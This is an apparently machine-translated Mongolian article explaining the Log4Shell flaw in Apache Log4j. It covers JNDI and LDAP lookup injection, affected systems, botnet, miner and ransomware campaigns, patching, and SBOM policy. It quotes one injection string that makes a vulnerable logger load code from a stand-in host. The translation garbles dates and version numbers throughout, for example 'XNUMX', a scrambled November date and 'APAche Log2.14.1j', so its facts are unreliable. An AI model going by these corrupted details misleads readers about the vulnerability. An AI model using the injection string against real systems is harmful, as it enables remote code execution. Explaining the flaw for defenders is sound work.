Гарчиг[Нуух][Үзүүлэх]
2021 оны XNUMX-р сарын сүүлээр бид кибер аюулгүй байдалд томоохон аюул занал учруулж байгааг илрүүлсэн. Энэхүү мөлжлөг нь дэлхий даяар сая сая компьютерийн системд нөлөөлж болзошгүй юм.
Энэ бол Log4j-ийн эмзэг байдал болон үл тоомсорлосон дизайны алдаа нь дэлхийн компьютерийн үйлчилгээний 90 гаруй хувийг халдлагад хэрхэн нээлттэй байлгадаг тухай гарын авлага юм.
Apache Log4j нь Apache Software Foundation-аас боловсруулсан нээлттэй эх сурвалжийн Java-д суурилсан бүртгэл хөтлөх хэрэгсэл юм. Анх 2001 онд Ceki Gülcü бичсэн бөгөөд одоо Apache Програм хангамжийн сангийн төсөл болох Apache Logging Services-ийн нэг хэсэг юм.
Дэлхий даяарх компаниуд Log4j номын санг ашиглан програмууд дээрээ бүртгэлээ идэвхжүүлдэг. Үнэндээ Java номын сан нь хаа сайгүй байдаг тул та үүнийг Amazon, Microsoft, Google болон бусад програмуудаас олох боломжтой.
Номын сангийн алдар нэр нь кодын аливаа алдаа нь сая сая компьютерийг хакердуулах боломжтой болгодог гэсэн үг юм. 24 оны арваннэгдүгээр сарын 2021-нд А үүлэн аюулгүй байдал Алибаба компанид ажилладаг судлаач нэгэн аймшигт алдаа илрүүлжээ.
Log4Shell гэгддэг Log4j-ийн эмзэг байдал нь 2013 оноос хойш анзаарагдаагүй. Энэ эмзэг байдал нь Log4j-г ажиллуулж байгаа нөлөөлөлд өртсөн системүүд дээр код ажиллуулах боломжийг хортой этгээдүүдэд олгосон. Энэ нь 9 оны 2021-р сарын XNUMX-нд олон нийтэд ил болсон
Салбарын мэргэжилтнүүд Log4Shell-ийн алдааг гэж нэрлэдэг Сүүлийн үеийн санах ойн хамгийн том эмзэг байдал.
Эмзэг байдлын тухай нийтлэгдсэний дараах долоо хоногт кибер аюулгүй байдлын баг сая сая халдлагыг илрүүлжээ. Зарим судлаачид минутанд зуу гаруй халдлага гарч байгааг ажигласан.
Энэ яаж ажилдаг вэ?
Log4Shell яагаад ийм аюултай болохыг ойлгохын тулд энэ нь ямар чадвартай болохыг ойлгох хэрэгтэй.
Log4Shell-ийн эмзэг байдал нь дур зоргоороо код гүйцэтгэх боломжийг олгодог бөгөөд энэ нь халдагчид зорилтот машин дээр дурын команд эсвэл кодыг ажиллуулж чадна гэсэн үг юм.
Үүнийг хэрхэн биелүүлдэг вэ?
Эхлээд бид JNDI гэж юу болохыг ойлгох хэрэгтэй.
Java нэрлэх ба лавлах интерфэйс (JNDI) нь Java программуудад нэрээр дамжуулан өгөгдөл, нөөцийг илрүүлэх, хайх боломжийг олгодог Java үйлчилгээ юм. Эдгээр лавлах үйлчилгээ нь программ үүсгэх үед хөгжүүлэгчдэд хялбар лавлах боломжтой зохион байгуулалттай бичлэгүүдийг өгдөг учраас чухал юм.
JNDI нь тодорхой лавлах руу хандахын тулд янз бүрийн протоколуудыг ашиглаж болно. Эдгээр протоколуудын нэг нь Lightweight Directory Access Protocol буюу LDAP юм.
Мөрийг бүртгэх үед, log4j маягтын илэрхийлэлтэй тулгарах үед мөр орлуулалтыг гүйцэтгэдэг ${prefix:name}
.
Жишээлбэл, Text: ${java:version}
Текст гэж нэвтэрсэн байж магадгүй: Java хувилбар 1.8.0_65. Ийм төрлийн орлуулалт нь ердийн зүйл юм.
гэх мэт илэрхийлэлтэй байж болно Text: ${jndi:ldap://example.com/file}
Java объектыг LDAP протоколоор дамжуулан URL-аас ачаалахад JNDI системийг ашигладаг.
Энэ нь тухайн URL-аас ирсэн өгөгдлийг машинд үр дүнтэй ачаалдаг. Аливаа боломжит хакер хортой кодыг нийтийн URL дээр байршуулж, Log4j ашигладаг машинууд үүнийг бүртгэхийг хүлээх боломжтой.
Бүртгэлийн мессежийн агуулга нь хэрэглэгчийн хяналттай өгөгдлийг агуулсан байдаг тул хакерууд өөрсдийн удирддаг LDAP сервер рүү чиглэсэн JNDI лавлагаа оруулах боломжтой. Эдгээр LDAP серверүүд нь JNDI нь эмзэг байдлыг ашиглан ажиллуулж болох хортой Java объектуудаар дүүрэн байж болно.
Үүнийг улам бүр дордуулж байгаа зүйл бол энэ програм нь сервер эсвэл клиент талын програм байх нь хамаагүй.
Бүртгэгчид халдагчийн хорлонтой кодыг унших арга байгаа л бол уг программ нь мөлжлөгт нээлттэй хэвээр байна.
Хэн өртөж байна вэ?
Энэ эмзэг байдал нь 4-оос 2.0 хүртэлх хувилбар бүхий APAche Log2.14.1j ашигладаг бүх систем, үйлчилгээнд нөлөөлдөг.
Аюулгүй байдлын хэд хэдэн мэргэжилтнүүд эмзэг байдал нь Java ашигладаг хэд хэдэн програмуудад нөлөөлж болзошгүй гэж зөвлөж байна.
Энэ согогийг анх Microsoft-ын эзэмшдэг Minecraft видео тоглоомоос олж илрүүлжээ. Майкрософт аливаа эрсдэлээс урьдчилан сэргийлэхийн тулд Java хувилбарын Minecraft програмыг шинэчлэхийг хэрэглэгчиддээ уриалав.
Кибер аюулгүй байдал, дэд бүтцийн аюулгүй байдлын агентлагийн (CISA) захирал Жен Истерли хэлэхдээ, борлуулагчид томоохон үүрэг хариуцлага эцсийн хэрэглэгчдийг энэ эмзэг байдлыг ашиглах хорлонтой этгээдээс урьдчилан сэргийлэх.
"Бүтээгдэхүүн нь ийм эмзэг байдлыг агуулсан гэдгийг эцсийн хэрэглэгчид мэдэж, програм хангамжийн шинэчлэлтийг нэн тэргүүнд тавих ёстой гэдгийг баталгаажуулахын тулд борлуулагчид хэрэглэгчидтэйгээ харилцах ёстой."
Халдлага аль хэдийн эхэлсэн гэж мэдээлж байна. Кибер аюулгүй байдлын програм хангамжаар хангадаг Symantec компани халдлага хийх олон тооны хүсэлтийг ажигласан.
Судлаачдын илрүүлсэн халдлагын зарим жишээг энд үзүүлэв.
- ботнэтээр
Ботнет нь халдлага үйлдэгч нэг талын хяналтан дор байдаг компьютеруудын сүлжээ юм. Тэд DDoS халдлага хийх, мэдээлэл хулгайлах болон бусад луйврыг хийхэд тусалдаг. Судлаачид Muhstik ботнетийг Log4j exploit-ээс татаж авсан бүрхүүлийн скриптүүдээс ажигласан.
- XMRig Miner Trojan
XMRig нь нээлттэй эхийн криптовалют олборлогч бөгөөд Monero токеныг олборлоход CPU ашигладаг. Кибер гэмт хэрэгтнүүд XMRig-ийг хүмүүсийн төхөөрөмж дээр суулгаж, өөрийн мэдэлгүйгээр боловсруулах хүчээ ашиглах боломжтой.
- Khonsari Ransomware
Ransomware гэдэг нь хортой програм хангамжийн хэлбэрийг хэлнэ файлуудыг шифрлэх компьютер дээр. Халдагчид дараа нь шифрлэгдсэн файлд хандах эрх олгохын тулд төлбөр шаардах боломжтой. Судлаачид Log4Shell халдлагад Khonsari ransomware-г илрүүлжээ. Тэд Windows серверүүдийг чиглүүлж, .NET хүрээг ашигладаг.
Дараа нь юу болдог вэ?
Мэргэжилтнүүдийн таамаглаж буйгаар Log4J-ийн эмзэг байдлаас үүдэлтэй эмх замбараагүй байдлыг бүрэн арилгахад хэдэн сар, магадгүй хэдэн жил шаардагдана.
Энэ процесс нь өртсөн систем бүрийг засварласан хувилбараар шинэчлэх явдал юм. Эдгээр бүх системүүд засварлагдсан байсан ч хакерууд серверүүд халдлагад өртөх боломжтой цонхонд аль хэдийн нэмсэн байж болзошгүй арын хаалганы аюул заналхийлсээр байна.
Олон шийдэл, нөлөөллийг бууруулах програмуудыг энэ алдаагаар ашиглахаас сэргийлэхийн тулд байдаг. Log4j-ийн шинэ хувилбар 2.15.0-rc1 нь энэхүү эмзэг байдлыг багасгахын тулд янз бүрийн тохиргоог өөрчилсөн.
JNDI-г ашигладаг бүх функцууд өгөгдмөлөөр идэвхгүй болох бөгөөд алсаас хайхыг мөн хязгаарласан. Log4j тохиргооны хайлтын функцийг идэвхгүй болгосноор боломжит мөлжлөгийн эрсдлийг бууруулахад тусална.
Log4j-ээс гадна нээлттэй эхийн мөлжлөгөөс урьдчилан сэргийлэх өргөн хүрээтэй төлөвлөгөө шаардлагатай хэвээр байна.
Тавдугаар сарын эхээр Цагаан ордон нэгэн гүйцэтгэх захирамж үндэсний кибер аюулгүй байдлыг сайжруулах зорилготой. Энэ нь программ хангамжийн материалын тооцооны (SBOM) заалтыг багтаасан бөгөөд энэ нь үндсэндээ програмыг бүтээхэд шаардлагатай бүх зүйлийн жагсаалтыг агуулсан албан ёсны баримт бичиг юм.
зэрэг хэсгүүд үүнд багтана нээлттэй эх багц, хамаарал болон хөгжүүлэлтэд ашигладаг API. Хэдийгээр SBOM-ийн санаа нь ил тод байдлыг хангахад тустай ч энэ нь хэрэглэгчдэд үнэхээр туслах уу?
Хамааралтай байдлыг сайжруулах нь хэтэрхий төвөгтэй байж магадгүй юм. Компаниуд өөр багц хайж олохын тулд нэмэлт цаг алдах эрсдэлээс илүү торгууль төлөхийг сонгох боломжтой. Магадгүй эдгээр SBOM-ууд нь зөвхөн ашигтай байх болно хамрах хүрээ цаашид хязгаарлагдмал байна.
Дүгнэлт
Log4j-ийн асуудал нь зөвхөн байгууллагын техникийн асуудал биш юм.
Бизнесийн удирдагчид сервер, бүтээгдэхүүн, үйлчилгээ нь өөрсдийнхөө засвар үйлчилгээ хийдэггүй код дээр тулгуурласнаар гарч болзошгүй эрсдэлийг мэддэг байх ёстой.
Нээлттэй эх сурвалж болон гуравдагч талын програмуудад найдах нь үргэлж тодорхой хэмжээний эрсдэл дагуулдаг. Шинэ аюул гарч ирэхээс өмнө компаниуд эрсдэлийг бууруулах стратеги боловсруулах талаар бодох хэрэгтэй.
Вэбийн ихэнх хэсэг нь дэлхий даяарх мянга мянган сайн дурынхны ажиллуулдаг нээлттэй эхийн програм хангамжид тулгуурладаг.
Хэрэв бид вэбийг аюулгүй газар байлгахыг хүсч байвал засгийн газар болон корпорациуд нээлттэй эх сурвалжийн хүчин чармайлт, кибер аюулгүй байдлын агентлагуудыг санхүүжүүлэхэд хөрөнгө оруулах ёстой. CISA.
хариу үлдээх